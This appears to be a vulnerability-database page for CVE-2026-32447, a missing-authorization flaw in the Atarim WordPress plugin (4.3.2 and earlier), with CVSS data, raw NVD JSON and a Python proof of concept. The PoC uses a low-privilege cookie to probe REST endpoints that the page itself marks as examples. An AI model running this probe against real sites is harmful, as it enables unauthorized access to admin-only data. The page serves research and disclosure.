Security Vulnerability Report
中文
CVE-2026-32447 CVSS 4.3 MEDIUM

CVE-2026-32447

Published: 2026-03-13 19:55:05
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Atarim: from n/a through <= 4.3.2.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Atarim Visual Collaboration <= 4.3.2
Atarim Visual Collaboration 从 n/a 版本起受影响

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32447 PoC - Missing Authorization in Atarim Plugin # Target: WordPress site with Atarim plugin <= 4.3.2 def exploit_atarim(target_url, low_priv_cookie): """ PoC for CVE-2026-32447: Missing Authorization vulnerability This script demonstrates how a low-privilege user can access admin-only functionality due to missing capability checks. """ # Identify vulnerable endpoint (example) vulnerable_endpoints = [ f"{target_url}/wp-json/atarim/v1/settings", f"{target_url}/wp-json/atarim/v1/projects", f"{target_url}/wp-json/atarim/v1/collaborators" ] headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)', 'Cookie': low_priv_cookie, 'Content-Type': 'application/json' } print("[*] Testing Atarim plugin for missing authorization...") for endpoint in vulnerable_endpoints: try: # Attempt to access admin-only endpoint with low privilege response = requests.get(endpoint, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] VULNERABLE: {endpoint}") print(f"[+] Response: {response.text[:500]}") elif response.status_code == 401 or response.status_code == 403: print(f"[-] Protected: {endpoint}") else: print(f"[?] Unexpected: {endpoint} - Status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error testing {endpoint}: {e}") if __name__ == "__main__": if len(sys.argv) < 3: print(f"Usage: python {sys.argv[0]} <target_url> <low_priv_cookie>") print("Example: python cve-2026-32447.py http://example.com 'wordpress_logged_in_xxx=yyy'") sys.exit(1) target = sys.argv[1] cookie = sys.argv[2] exploit_atarim(target, cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32447", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:55:05.490", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Vito Peleg Atarim atarim-visual-collaboration allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Atarim: from n/a through <= 4.3.2."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en Vito Peleg Atarim atarim-visual-collaboration permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a Atarim: desde n/a hasta &lt;= 4.3.2."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/atarim-visual-collaboration/vulnerability/wordpress-atarim-plugin-4-3-2-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}